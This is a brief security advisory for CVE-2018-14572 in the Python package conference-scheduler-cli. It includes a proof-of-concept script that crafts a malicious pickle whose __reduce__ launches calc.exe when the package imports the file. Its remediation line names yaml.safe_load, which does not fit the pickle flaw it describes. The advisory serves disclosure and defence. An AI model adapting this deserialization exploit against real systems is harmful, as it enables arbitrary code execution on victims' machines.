CVE-2018-14572: Vulnerability in Conference-scheduler-cli

Python Package:　　conference-scheduler-cli

Version:　　　　　 <= 0.10.1 

Published:　　　　24 Jul 2018  

Reported by: 　　　　　 Joel

CVE-2018-14572 　　　CVE_details

Overview

In conference-scheduler-cli, a pickle.load call on imported data allows remote attackers to execute arbitrary code via a crafted .pickle file, as demonstrated by Python code that contains an os.system call.

POC

1
2
3
4
5
6
7
8
9
10
11
12
13

from scheduler import io
import os
from pathlib import Path
import pickle
class joel_test(object):
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, ('calc.exe',))
test = joel_test()
f=open('solution\\scheduler.pickle','wb')
pickle.dump(test,f)
f.close()
io.import_schedule_definition(Path(Path.cwd(), 'solution'))

Remediation

It should use yaml.safe_load to parse yaml file.